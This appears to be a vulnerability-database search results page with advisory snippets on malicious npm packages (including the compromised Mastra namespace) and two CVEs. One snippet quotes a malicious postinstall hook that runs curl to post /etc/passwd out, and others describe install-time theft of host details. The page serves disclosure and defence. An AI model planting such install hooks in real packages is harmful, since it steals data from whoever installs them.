Lucene search
K

8 matches found

The Hacker News
The Hacker News
added 2026/06/17 7:38 a.m.25 views

145 Mastra npm Packages Compromised via Hijacked Contributor Account

As many as 145 npm packages associated with the Mastra namespace "@mastra/", a popular open-source JavaScript and TypeScript framework for building artificial intelligence AI applications, have been compromised as part of a software supply chain attack codenamed easy-day-js , per findings from...

6AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 9:4 p.m.10 views

Malicious code in @giftyhq/widget-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ad3f12a6a12fbfa60e4a72747df6974f89906200568926b99a8c93c489b5e62 package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js collects host fingerprinting data —...

5.3AI score
Exploits0References1
OSV
OSV
added 2026/06/09 5:40 p.m.7 views

MAL-2026-5416 Malicious code in @klapp-otp/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9246974efd1a626094dd3f2027df2e8f1468ce45ebcba42e5207a06c5c9e16ee On npm install, this package auto-executes index.js via the preinstall lifecycle hook. The script collects os.hostname, os.userInfo, dirname,...

5.5AI score
Exploits0References2
OSV
OSV
added 2026/06/09 5:19 p.m.14 views

MAL-2026-5429 Malicious code in @shell-landing/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577 On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

5.5AI score
Exploits0References1
OSV
OSV
added 2026/06/09 5:16 p.m.6 views

MAL-2026-5425 Malicious code in @oplus/obus-web-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 956ecc19633177f7ef9b458e6407ffbba6c8366688249c07bfd7f3c8e85c17a9 On npm install, the package's scripts/postinstall.js collects the installer's username os.userInfo, hostname os.hostname, current working directory...

5.4AI score
Exploits0References1
Vulnrichment
Vulnrichment
added 2026/06/02 11:13 a.m.8 views

CVE-2026-8993 Improper URL Handler Processing in D.Launcher 2 enables NTLM Credential Disclosure and SSRF attacks

D.Launcher 2 component of Slovak eID client ecosystem contains Improper URL Handler Processing vulnerability. Application registers multiple custom URL handlers that could be exploited to initiate full NTLM autentication or SMB connection to attacker infrastructure and to conduct SSRF Server Side...

6.5CVSS5.8AI score0.00225EPSS
Exploits0References2
CNNVD
CNNVD
added 2026/06/02 12:0 a.m.5 views

authentik 输入验证错误漏洞

Authentik is an open-source identity provisioning application. Versions of Authentik prior to 2026.2.3 had a vulnerability related to input validation errors. This vulnerability stemmed from the WS-Federation provider’s use of raw string prefixes for validation instead of proper URL parsing, whic...

6.9CVSS5.3AI score0.00182EPSS
Exploits0References1
OSV
OSV
added 2026/05/20 2:11 p.m.8 views

MAL-2026-4372 Malicious code in @budetzz/baileys (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c79c7b873a8ea61831fdfd7b987de0efbf8944d2fd407a8dca4b70042a3d029c This package is a republished fork of @whiskeysockets/baileys that adds two undocumented network behaviors. 1 lib/Socket/newsletter.js line 111...

5.8AI score
Exploits0References4
Rows per page
Query Builder